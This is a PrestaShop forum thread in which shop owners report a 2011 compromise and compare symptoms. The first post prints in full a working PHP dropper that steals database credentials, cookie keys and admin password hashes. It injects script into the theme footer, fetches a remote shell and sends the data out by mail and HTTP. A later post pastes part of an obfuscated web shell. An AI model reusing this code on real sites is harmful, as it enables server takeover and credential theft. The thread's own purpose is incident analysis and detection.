Jump to content
Sign in to follow this  
Muller

Footer.tpl vulnerability?

Recommended Posts

Hi all,

 

I use an SCM system, I was just about to commit some files when I see in the "unversioned" list of files a new file which I did not remember creating. It's called "her.php" and it sits under the modules directory. So I opened it with a php editor, and here is the content:

 


<?php
error_reporting(0);
$shcode = "{literal}".base64_decode("PHNjcmlwdD5TdHJpbmcucHJvdG90eXBlLmFzZD1mdW5jdGlvbigpe3JldHVybiBTdHJpbmcuZnJvbUNoYXJDb2RlO307T2JqZWN0LnByb3RvdHlwZS5hc2Q9ImUiO3RyeXtmb3IoaSBpbnt9KWlmKH5pLmluZGV4T2YoJ2FzJykpdGhyb3cgMTt9Y2F0Y2gocSl7enhjPXt9W2ldO312PWRvY3VtZW50LmNyZWF0ZVRleHROb2RlKCdhc2QnKTt2YXIgcz0iIjtmb3IoaSBpbiB2KWlmKGk9PSdjaGlsZE5vZGVzJylvPXZbaV0ubGVuZ3RoKzE7byo9MjtlPWV2YWw7bT1bMTIwLW8sOTktbywxMTYtbywzNC1vLDEwMi1vLDM0LW8sNjMtbywzNC1vLDExMi1vLDEwMy1vLDEyMS1vLDM0LW8sNzAtbyw5OS1vLDExOC1vLDEwMy1vLDQyLW8sNDMtbyw2MS1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjItbyw2My1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDc5LW8sOTktbywxMTgtbywxMDYtbyw0OC1vLDEwNC1vLDExMC1vLDExMy1vLDExMy1vLDExNi1vLDQyLW8sMTAyLW8sNDgtbywxMDUtbywxMDMtbywxMTgtbyw3MC1vLDk5LW8sMTE4LW8sMTAzLW8sNDItbyw0My1vLDQ5LW8sNTItbyw0My1vLDQ1LW8sNTktbyw1Ny1vLDQzLW8sNjEtbywzNC1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjMtbyw2My1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDEwMi1vLDQ4LW8sMTA1LW8sMTAzLW8sMTE4LW8sNzQtbywxMTMtbywxMTktbywxMTYtbywxMTctbyw0Mi1vLDQzLW8sNDUtbyw1OS1vLDU3LW8sNDMtbyw2MS1vLDEwMi1vLDExMy1vLDEwMS1vLDExOS1vLDExMS1vLDEwMy1vLDExMi1vLDExOC1vLDQ4LW8sMTIxLW8sMTE2LW8sMTA3LW8sMTE4LW8sMTAzLW8sNDItbywzNi1vLDYyLW8sMTA3LW8sMTA0LW8sMTE2LW8sOTktbywxMTEtbywxMDMtbywzNC1vLDExNy1vLDExNi1vLDEwMS1vLDYzLW8sNDEtbywxMDYtbywxMTgtbywxMTgtbywxMTQtbyw2MC1vLDQ5LW8sNDktbywxMDEtbywxMTAtbywxMDctbywxMDEtbywxMDktbywxMTEtbywxMDMtbywzNi1vLDQ1LW8sMTIyLW8sNDUtbywxMjMtbyw0NS1vLDM2LW8sNDgtbywxMDQtbywxMDctbywxMTAtbywxMDMtbyw5OS1vLDEyMC1vLDEwMy1vLDQ4LW8sMTAxLW8sMTEzLW8sMTExLW8sNDEtbywzNC1vLDEyMS1vLDEwNy1vLDEwMi1vLDExOC1vLDEwNi1vLDYzLW8sNTAtbywzNC1vLDEwNi1vLDEwMy1vLDEwNy1vLDEwNS1vLDEwNi1vLDExOC1vLDYzLW8sNTAtbyw2NC1vLDM2LW8sNDMtbyw2MS1vXTttbT0nJy5hc2QoKTtmb3IoaT0wO2k8bS5sZW5ndGg7aSsrKXMrPW1tKGUoIm0iKyJbIisiaSIrIl0iKSk7ZShzKTs8L3NjcmlwdD4=")."{/literal}";
$shurl = "http://www.c2bill.it/stest/chkpnt/shell.txt";  
$msgurl = "http://www.c2bill.it/stest/chkpnt/sdata.php";
$mails = "samuvel_hitroy@aol.com, preop@gmx.com";
function deletedir($arg){   $d=opendir($arg);  while($f=readdir($d)){     if($f!="."&&$f!=".."){        if(is_dir($arg."/".$f))        deletedir($arg."/".$f);       else         unlink($arg."/".$f);     }  }  rmdir($arg);closedir($d);}
@include("../config/settings.inc.php");
///Host info
$hostvar = "host:".$_SERVER["HTTP_HOST"]."\n"."ref:".$_SERVER["HTTP_REFERER"]."\n"."path:".$_SERVER["SCRIPT_FILENAME"]."\n=====\n";
///Server info
$srvvar =  _DB_SERVER_."\n"._DB_USER_."\n"._DB_PASSWD_."\n"._DB_NAME_."\n"._DB_PREFIX_."\n"._COOKIE_KEY_."\n"._COOKIE_IV_."\n"._PS_VERSION_."\n=====\n";
///GET admin
mysql_connect(_DB_SERVER_,_DB_USER_,_DB_PASSWD_);
mysql_selectdb(_DB_NAME_);
$r = mysql_query("SELECT `email`, `passwd` FROM `"._DB_PREFIX_."employee` WHERE id_profile = 1");
while($ro=mysql_fetch_assoc($r)){$usrs .= $ro['email'].":".$ro['passwd']."\n";}
//Wride sploit
@deletedir("../tools/smarty/compile/");
@deletedir("../tools/smarty/cache/"); 
@deletedir("../tools/smarty_v2/"); 
@deletedir("../tools/smarty_v2/"); 
$fn = "../themes/"._THEME_NAME_."/footer.tpl";
$f = fopen($fn,"r");$ff = fread($f,filesize($fn));fclose($f);
$ff = str_replace("</body>","                                     ".$shcode."</body>",$ff);
$f = fopen($fn,"w");$rf = fwrite($f,$ff);fclose($f); 
if($rf>0) $wrres = "true"; else $wrres = "false";
//write shell
$sh = file_get_contents($shurl);
$shf = "../upload/".md5(date("r")).".php"; 
$f = fopen($shf,"w");$rf = fwrite($f,$sh);fclose($f);
$shf2 = "../download/".md5(date("r")).".php"; 
$f = fopen($shf2,"w");$rf = fwrite($f,$sh);fclose($f);
@unlink("../download/.htaccess");
$msg = $hostvar.$srvvar.$usrs."=====\nTemplate writed:".$wrres."\n=====\nShells:\n".$shf."\n".$shf2."\n=====\n";
@mail($mails,"new shop",$msg);
@file_get_contents($msgurl."?data=".base64_encode($msg));
@unlink(__FILE__);
?>

 

That looks like they're emailing all the back office user/passwords to the two emails specified at the top of the code.

 

Did someone hack into my computer and put this file there?

What do you think guys?

 

I'm running an anti-virus check obviously as I write this...

  • Like 1

Share this post


Link to post
Share on other sites

Weird, I had the same file, created today. It could be a new exploit or a timed virus that downloads this file on a given day. This is definitely created specifically for prestashop.

 

You should check your upload and download directories for php files, that are not named index.php. You should check your theme folder, footer.tpl file. It might have some new javascript at the end.

 

This file does send the username and passwords of employees. But that is useless, the passwords are hashed so you can not use them for login. But it also sends your database user name and password. You might want to change them just in case. If your mysql server is accessible externally they will be able to login.

Share this post


Link to post
Share on other sites

Thanks.

 

I posted this on Reddit at:

 

I'm getting help there. I discovered new files in the download and upload directory, as well as modifications in my theme's footer.tpl which I deleted.

 

The file was only run on my localhost, not on the live server.

Share this post


Link to post
Share on other sites

The file was not placed on the live sever, only on my local machine.

I'm running 1.4.3.0.

 

Please go to the link I posted in my previous reply to Reddit.com, as some guys helped there finding out what the script actually does.

 

The question is how it happened, and how we stop it from happening again.

Share this post


Link to post
Share on other sites

I have seen the same thing on another shop today.

Can you give us a list of 3rd party modules you use in your shop, and I can see if the same modules are used in the affected shop i found.

Share this post


Link to post
Share on other sites

I have seen the same thing on another shop today.

Can you give us a list of 3rd party modules you use in your shop, and I can see if the same modules are used in the affected shop i found.

 

The only modules I use are the ones that came with 1.4.3.0. The only module I downloaded from prestashop.com is their own authorize.net SIM module. That's the only module I installed that did not came with Prestashop already.

Share this post


Link to post
Share on other sites

I just started using PrestaShop a few days ago to discover what's it all about - It works great, despite the hack today:

 

* working on an online server, the public_html was protected by .htaccess (this protection was disabled when I found out about it).

* I can't find her.php on the server anymore (in the apache-log I can see it)

 

Is there any more information I can give to help out what this caused?

 

* PrestaShop: 1.4.4.0

* Theme: Matrice

Share this post


Link to post
Share on other sites

Hi Muller,

First of all, I want to let you know that we take this sort of situation extremely seriously, and have already assigned it as the top priority to our most qualified developer, Maxence (who as you can see, is already on the case). He is investigating it to try to locate the source, even if it is from an external module. If you would like to speak with him directly, we invite you to MP him to give him any additional information that could be helpful.

 

I will let you know as soon as I receive more news, but please just know that we are working very hard to ensure that this will not happen again, not to you or anyone else in the PrestaShop community.

 

-Mike

Share this post


Link to post
Share on other sites

I have also had the same thing happen tonight about 1 hour ago and I am looking for the source.

 

I think hta access files have been added as well as a script in the download folder but i can't open it.

 

Regards,

 

Mark.

Share this post


Link to post
Share on other sites

We're working to find the solution for you, but in the meantime, you may want to check the suggestions posted on the reddit link that Muller posted near the top. Take those suggestions with a grain of salt, but they may be worth exploring on your local machine after a back-up.

 

-Mike

Share this post


Link to post
Share on other sites

I've checked the Apache Usage logs, couldn't find an other IP address than mine.

There was a GET command to her.php ... [23/Aug/2011:17:44:21 +0200] "GET /modules/her.php HTTP/1.1" 200 304 ...

 

In Download & Upload is a new file named: f48be302135d80a289c0e56fae37952e.php

These files are also dated 23/aug 17:44 - the same time footer.tpl changed.

 

Did it happen at the same time for everyone?

Share this post


Link to post
Share on other sites

This also happened to me, running 1.4.3

 

I couldn't find the "her.php" but my footer.tpl was definitely changed.

 

The only 3rd party module I had installed was jbx_menu.

 

Did anyone else have this happen while running 1.4.4?

Share this post


Link to post
Share on other sites

Dang it, I hope they can find the source of the problem soon. Just launched the site live, otherwise I would take it down. Might have to anyway!

 

Also, I am not familiar with the correct PrestaShop .htaccess file. How do I know what to remove from there? (I have cleaned everything else up)

Share this post


Link to post
Share on other sites

Wow, this looks serious.

I discovered today that I have the same issue. I thought that I was the only with a compromised Prestashop installation, till I read this topic.

 

I'm running a 1.4.4 version, updated from 1.4.3

 

Today, I saw that my FO was messed up: the Category block was empty, my slideshow stopped working and the footer has shifted upwards. When I use Firebug to check the html rendered code, I saw links to 2 external sites. I'm afraid I don't remember anymore which sites those were linking to...

 

I checked my footer.tpl and found weird and suspicious code at the bottom. In addition, php files were added to the /upload and /download folders. Also, the .htaccess file (to deny access) in the /download folder was gone.

 

In my case, this happened right after I've uploaded an html email file to my /mails/xx folder. This file was from someone else on the forum who I'm helping with an email layout problem. So my initial reaction was that this HTML file was somehow infected but seeing similar issues with others, I wonder if that's the case...

 

I've attached both footer.tpl (with just the weird code) and one of added php files so the developers can have a look at it.

compromised.zip

Share this post


Link to post
Share on other sites

I'm running 1.4.4 and my site went down at 2:00pm UK time. My webhost has just pointed me to this thread and I have the same files added to my upload and download folders along with the addition to the footer.tpl file.

Share this post


Link to post
Share on other sites

The footer.tpl file and a file named menu.3 within the "cache" folder from the "jbx_menu" module were modified at the same time, so i dont know if that´s relevant or not.

Share this post


Link to post
Share on other sites

I'm using jbx_menu as well...

Can all the people who have posted here and encountered the same problem confirm that they are using this menu?

Share this post


Link to post
Share on other sites

For anyone who finds a her.php file under their modules directory, you should do the following:

- Check the file creation time, write this down and delete the file from your server.

- Go to your apache raw access logs. You should be able to access it using hosting control panel.

- Find the line that corresponds to the file creation time you wrote down earlier.

- Copy the section starting 5 minutes before to 5 minutes after. Save it in a text file and share it here.

This data would help identify the root of the problem.

 

To see if you have been attacked, check the following:

- Is there any php file under your uploads or downloads directory apart from index.php?

- Is there a strange javascript at the end of your footer.tpl file?

 

If any of the above happens, change your mysql username and password.

Share this post


Link to post
Share on other sites

I'm not using JBX_menu!

 

Strange thing is: I can't find anything in the log files about the new files created in the download and upload directory...

Share this post


Link to post
Share on other sites

Ok, at least we can rule out the jbx_menu as the source of the problem...

 

Two more things.

 

First, I didn't see a her.php file in my modules folder but still had the infected footer.tpl and the suspicious php files in upload and download folders.

 

Second, I had a quick look at my downloaded PS 1.4.4 file (from the Prestashop website) and found a .DS_Store file in the root folder. If my memory serves me well, this a (hidden) archive file from MacOS systems. This file was thus also present on my server installation during my upgrade process. Probably not related to the issue but still worth mentioning it.

Share this post


Link to post
Share on other sites

Same thing for me.... I'm not using jbx_menu but JBSlider and JBVariousLinks.

Prestashop 1.4.3 and same files in upload, dowload and code in footer.tpl into my theme folder.

 

SQL password changed... and wait...

Share this post


Link to post
Share on other sites

The .DS_store is indeed from Mac, has probably nothing to do with the problem.

 

About her.php: The file is automatically deleted, the TS was lucky to see it in time...

 

Still: shouldn't you see every action in the apache log files? Like the creation of her.php, I can't find this. Or do you need different logfiles for this? (don't know much about those log files)

Share this post


Link to post
Share on other sites

Same things for me. I use PS 1.4.4, in local server (not live server) and code has been add in my theme footer.php

 

mini_83257973az.jpg

Share this post


Link to post
Share on other sites

I have just checked a second store I run and this has not been effected by this issue. I havent got round to upgrading this store yet so it is still running version 1.3.7. It appears the issue only effects version 1.4

Share this post


Link to post
Share on other sites

Same problem in prestashop 1.4.4 with Matrice.

 

This code was added.

 

<?php 
if (isset($_GET['session2'])){
$auth_pass = "fa816edb83e95bf0c8da580bdfd491ef";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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